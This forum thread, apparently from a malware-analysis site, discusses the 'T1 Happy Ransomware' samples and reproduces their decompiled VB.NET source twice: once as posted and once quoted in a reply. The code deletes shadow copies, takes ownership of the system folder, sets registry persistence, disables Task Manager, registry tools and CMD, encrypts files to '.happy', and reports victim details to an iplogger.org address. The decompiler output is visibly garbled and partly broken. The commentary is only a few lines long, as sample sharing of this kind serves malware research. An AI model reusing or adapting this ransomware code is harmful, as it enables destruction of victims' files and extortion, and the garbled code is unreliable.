T1 Happy Ransomware
Sample 1:
MD5: 29cdb46d2e01f2efb9644c7695a007bb
VT: https://www.virustotal.com/#/file/3ed94 ... /detection
Sample 2:
MD5: b7afca788487347804156f052c613db5
VT: https://www.virustotal.com/#/file/b7afc ... 052c613db5
Happy Ransomware (T1)
Happy Ransomware (T1)
You do not have the required permissions to view the files attached to this post.
Re: Happy Ransomware (T1)
I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:
Part of the code:
Code: Select all
Private Sub EndOf()
System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
Try
webclient1.Headers
"User-Agent"
New String(9) {}
New String(9) {}(0) = "Name="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
webclient1.DownloadData("https://iplogger.org/21zut")
Finally
If (webclient1 Is Not Nothing) Then
webclient1.Dispose()
End If
End Try
System.Threading.Thread.Sleep(15000)
ProjectData.EndApp()
End Sub
Private Sub Regs()
New Process()
New Process().StartInfo.FileName = "wmic.exe"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
Try
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
End Try
End Sub
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
Try
rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
Return rijndaelmanaged1.CreateEncryptor()
Catch exception1 As Exception
ProjectData.SetProjectError(exception1)
End Try
Return Nothing
End Function
Private Sub EncryptDirectory(ByVal path As String)
Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
Dim num1 As Integer = 0
Do While (num1 < array1.Length())
Dim str1 As String = array1(num1)
Try
System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
Me.i = (Me.i + 1)
Catch exception1 As Exception
End Try
num1 = (num1 + 1)
Loop
End Sub
My forum: hackrhouse.freeforums.net
Re: Happy Ransomware (T1)
100% .Net cheap ransomware.hackr8 wrote: ↑Tue Jan 29, 2019 3:04 pmI personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:Code: Select all
Private Sub EndOf() System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE) System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE) System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE) System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE) Dim webclient1 As System.Net.WebClient = New System.Net.WebClient() Try webclient1.Headers "User-Agent" New String(9) {} New String(9) {}(0) = "Name=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2)) New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time=" New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString() webclient1.DownloadData("https://iplogger.org/21zut") Finally If (webclient1 Is Not Nothing) Then webclient1.Dispose() End If End Try System.Threading.Thread.Sleep(15000) ProjectData.EndApp() End Sub Private Sub Regs() New Process() New Process().StartInfo.FileName = "wmic.exe" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start() New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."" New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose() Try Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location) Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer)) Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer)) Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer)) Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer)) Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer)) Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer)) Catch exception1 As Exception ProjectData.SetProjectError(exception1) End Try End Sub Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte() Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged() Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng() Try rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key)) rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length()) Return rijndaelmanaged1.CreateEncryptor() Catch exception1 As Exception ProjectData.SetProjectError(exception1) End Try Return Nothing End Function Private Sub EncryptDirectory(ByVal path As String) Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories) Dim num1 As Integer = 0 Do While (num1 < array1.Length()) Dim str1 As String = array1(num1) Try System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg")) T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy") Me.i = (Me.i + 1) Catch exception1 As Exception End Try num1 = (num1 + 1) Loop End Sub